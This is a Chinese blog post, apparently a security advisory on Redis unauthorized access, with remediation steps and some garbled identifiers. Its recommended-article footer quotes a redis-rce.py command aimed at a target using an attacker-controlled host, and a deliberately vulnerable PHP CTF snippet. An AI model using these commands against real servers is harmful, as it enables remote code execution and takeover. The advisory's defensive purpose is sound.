redis主从复制漏洞/安全通告-Redis未授权访问漏洞_详细渗透知识点

于 2024-08-07 15:23:29 发布
阅读量209 收藏
点赞数 2
文章标签: 漏洞 访问 默认
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84915584/article/details/140993138
版权

redis主从复制漏洞/安全通告-Redis未授权访问漏洞_详细渗透知识点

漏洞描述

Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略(比如添加防火墙规则避免其他非信任来源ip访问等),在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取Redis的数据。

漏洞编号

CNNVD--23

漏洞危害

攻击者在未授权访问Redis的情况下,利用Redis自身提供的命令,可以进行写文件操作,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录服务器。

漏洞等级

高危

受影响版本

Redis 2.x,3.x,4.x,5.x

修复方案

1.设置密码访问认证,可通过修改redis.conf配置文件中的""设置复杂密码 (需要重启Redis服务才能生效);

2.对访问源IP进行限制,可在防火墙限定指定源ip才可以连接Redis服务器;

3.禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的"#bind 127.0.0.1",去掉前面的"#"即可(需要根据实际业务判断,如只要监听在本机可操作);

4.修改Redis默认端口,将默认的6379端口修改为其他端口;

参考链接

1. "CNNVD--2300

~

网络安全学习,我们一起交流

~

黑客小媚子
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1548
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
Java 全栈知识体系( PDF 可下载)
m0_67698950的博客
03-17 5301
40000 +字长文总结,民工哥已将此文整理成PDF文档了,需要的见文后下载获取方式。 全栈知识体系总览 Java入门与进阶 面向对象与Java基础 Java 基础 - 面向对象 Java 基础 - 知识点 Java 基础 - 图谱 & Q/A 基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制: Java 基础 - 泛型机制详解 Java泛型这个特性是从JDK 1.5才开始加入的,因此为了兼容之前的版本
Redis基于主从复制RCE
m0_58596609的博客
10-13 2491
Redis基于主从复制RCE
RedisRCE漏洞
midi
02-13 1767
前言 做ssrf时碰到个redis主从复制([网鼎杯 2020 玄武组]SSRFMe) writeup <?php if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ highlight_file(__FILE__); } if(isset($_POST['file'])){ file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file'])
Redis主从漏洞和远程连接漏洞
LeeZbug的博客
02-16 3747
主从复制漏洞: 参考文章:Redis主从复制getshell技巧 - Bypass - 博客园 1.so和rce文件下载:GitHub - LeeZBug/redis-rce: Redis 4.x/5.x RCE 下载后安装所需要的python库,pip install -r requirement.txt 2.运行rce python redis-rce.py -r [target_ip] -L [attack_ip] -a [redis_require_password] -f module
一文清晰带你认识redis漏洞
逍遥小哥的博客
02-01 1625
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1953
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问漏洞详解
白泽Sec安全实验室
12-03 1382
一、Redis是啥 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 二、漏洞危害 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,这样将会将 Redis 服务暴露到公网上。会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Re
redis授权漏洞详细利用
pray030的博客
02-23 3673
r
运维的一些日常知识点
weixin_41915416的博客
03-18 1738
1、查看CPU、内存、磁盘、进程使用情况 查看CPU负载使用uptime、查看CPU信息cat /proc/cpuinfo、查看磁盘使用情况df -Th、查看进程ps -aux\top\netstat -ntlp、查看内存free -m 2、ping命令通过什么协议来实现?互联网控制报文协议ICMP 3、NAT使用的几种情况 ①连接到Internet,由于没有足够的公网地址分配给内部主机 ②更改到...
Java 全栈知识体系
weixin_70730532的博客
07-27 6514
40000 +字长文总结。 面向对象与Java基础 Java 基础 - 面向对象Java 基础 - 知识点Java 基础 - 图谱 & Q/A基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制:Java 基础 - 泛型机制详解Java泛型这个特性是从JDK 1.5才开始加入的,因此为了兼容之前的版本,Java泛型的实现采取了“伪泛型”的策略,即Java在语法上支持泛型,但是在编译阶段会进行所谓的“类型擦除”(Type Erasure),将所有的泛型表示(尖括号中的内容)都替换为具体的
40000+字超强总结?阿里P8把Java全栈知识体系详解整理成这份PDF
xiaohao718的博客
06-27 1263
40000 +字长文总结,已将此文整理成PDF文档了,需要的见文后下载获取方式。全栈知识体系总览Java入门与进阶面向对象与Java基础基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制:A. Java进阶 - Java 集合框:Java 集合框架应用是极其广泛的,对于其总体框架用法及源码都必要深刻理解。B. Java进阶 - Java 集合框之 Collection源码解读:对核心的Collection类进行源码解读。C. Java进阶 - Java 集合框之 Map & Set 源码解读
Redis-主从复制(一)
全力奔跑,梦在彼岸
09-02 344
什么是主从复制? &nbsp;&nbsp;&nbsp;&nbsp;将一台redis服务器的数据,复制到其他的redis服务器,前者称为主节点,后者称为从节点,数据的复制是单向的,只能由主节点复制到从节点。 &nbsp;&nbsp;&nbsp;&nbsp;默认情况下,每台redis服务器都是主节点,一个主节点可以有多个从节点(或者没有),但一个从节点只能有一个主节点。 主从复制的作用? &n...
漏洞复现---Redis 远程命令执行漏洞复现
dust_hk的博客
07-10 6850
0x00 Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型...
Redis漏洞复现——Redis 4.x/5.x 授权访问漏洞
Aquarius_ego的博客
03-30 4557
Redis 4.x/5.x 授权访问漏洞复现
redis主从复制
weixin_63231007的博客
02-28 1785
redis主从复制原理以及简单演示(环境真难搭)
渗透测试】redis漏洞利用
最新发布
网络安全从业者的学习笔记
03-16 1451
redis是一个key-value存储系统,在诸多版本中存在一系列的漏洞,对漏洞进行复现:写入Webshell、写入定时任务、主从复制命令执行、如何通过利用SSRF结合gopher、dict协议打redis。切勿利用漏洞非法获取数据
Redis系列漏洞总结
NLost
10-21 6382
授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
Redis授权访问利用合集
em.....
07-07 847
微信公众号:小惜渗透,欢迎大佬一起交流进步正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。搭建环境: 将这行绑定本地加上注释(还可以改成0.0.0.0)将保护模式关闭保存,然后启动redis服务 切记别忘了关防火墙在/roo
Redis主从配置与安全:min-slaves-to-write与masterauth
"Redis 中文教程,超详细内容涵盖了从服务器配置、主从同步、数据安全性以及 Redis 命令参考。" 在 Redis 中,从服务器的配置是确保数据复制和高可用性的重要环节。在标题提及的《concurrency in go: tools and ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值